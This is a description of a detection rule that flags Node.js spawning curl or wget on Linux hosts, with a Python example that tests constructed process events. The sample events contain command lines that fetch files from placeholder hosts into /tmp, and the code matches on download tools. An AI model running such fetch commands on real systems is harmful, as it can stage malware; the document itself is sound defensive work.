
Summary
This detection rule identifies instances where Node.js spawns the curl or wget commands, either directly or via a shell, which may indicate command and control (C2) activity: adversaries may abuse Node.js to download additional malware or tools onto a compromised system. The rule uses Event Query Language (EQL) to analyze process events on Linux hosts, specifically process creation events whose parent process is Node.js. The detection logic matches shell interpreters (such as bash or zsh) executing command lines that include curl or wget, as well as direct executions of those commands. When such behavior is detected within the defined time frame, the rule triggers an alert with a low risk score of 21, indicating a potential security incident that may warrant further investigation. To use this rule, Elastic Defend must be set up in conjunction with the Elastic Agent; that integration provides the process-related events the detection depends on.
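The detection logic described above, as an added Python example that is not the rule's own EQL query: it evaluates constructed ECS-style process-start events the way the rule does, matching a Node.js parent with a direct curl/wget child or a shell child whose command line invokes curl or wget. The shell list and the event field layout are assumptions for this example.

```python
import re
from typing import Dict, List

# Process names treated as shell interpreters and as download tools. The shell
# list is an assumption for this example, not the rule's exact list.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "fish"}
DOWNLOADERS = {"curl", "wget"}
RISK_SCORE = 21
# curl/wget as a command token (optionally path-qualified) inside a shell command line
_DOWNLOAD_TOKEN = re.compile(r"(?:^|[\s;|&(`])(?:\S*/)?(?:curl|wget)(?=\s|$)")


def matches_rule(event: Dict) -> bool:
    """True when a Linux process-start event has Node.js as its parent and the
    child is curl/wget, or a shell whose command line invokes curl or wget."""
    if event.get("host.os.type") != "linux" or event.get("event.type") != "start":
        return False
    if event.get("process.parent.name") != "node":
        return False
    name = event.get("process.name", "")
    if name in DOWNLOADERS:
        return True  # direct execution, e.g. child_process.spawn("wget", [...])
    if name in SHELLS:
        # shell wrapper, e.g. child_process.exec("curl ...") -> bash -c "curl ..."
        return _DOWNLOAD_TOKEN.search(" ".join(event.get("process.args", []))) is not None
    return False


def find_alerts(events: List[Dict]) -> List[Dict]:
    """One alert record per matching event, carrying the rule's risk score."""
    return [{"pid": e["process.pid"], "command": " ".join(e["process.args"]),
             "risk_score": RISK_SCORE} for e in events if matches_rule(e)]


def ev(parent: str, name: str, pid: int, args: List[str], os: str = "linux") -> Dict:
    """Build a minimal ECS-style process-start event (constructed sample data)."""
    return {"host.os.type": os, "event.type": "start", "process.parent.name": parent,
            "process.name": name, "process.pid": pid, "process.args": args}


# Constructed sample events standing in for Elastic Defend process data.
SAMPLE_EVENTS = [
    ev("node", "bash", 4101, ["bash", "-c", "curl -fsSL http://example.invalid/s -o /tmp/s"]),
    ev("node", "wget", 4102, ["/usr/bin/wget", "http://example.invalid/tool"]),
    ev("node", "bash", 4103, ["bash", "-c", "ls -la /tmp"]),                 # benign shell use
    ev("systemd", "curl", 4104, ["curl", "http://example.invalid/health"]),  # parent is not node
    ev("node", "curl", 4105, ["curl", "http://example.invalid/x"], os="windows"),  # Linux-only rule
]
```

Only the first two sample events produce alerts; the benign shell command, the non-Node.js parent and the non-Linux host are all filtered out, which is where tuning against legitimate Node.js build or health-check scripts would start.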
Categories
- Endpoint
- Linux
Data Sources
- Process
- Application Log
- Network Traffic
ATT&CK Techniques
- T1071
- T1071.001
Created: 2025-09-18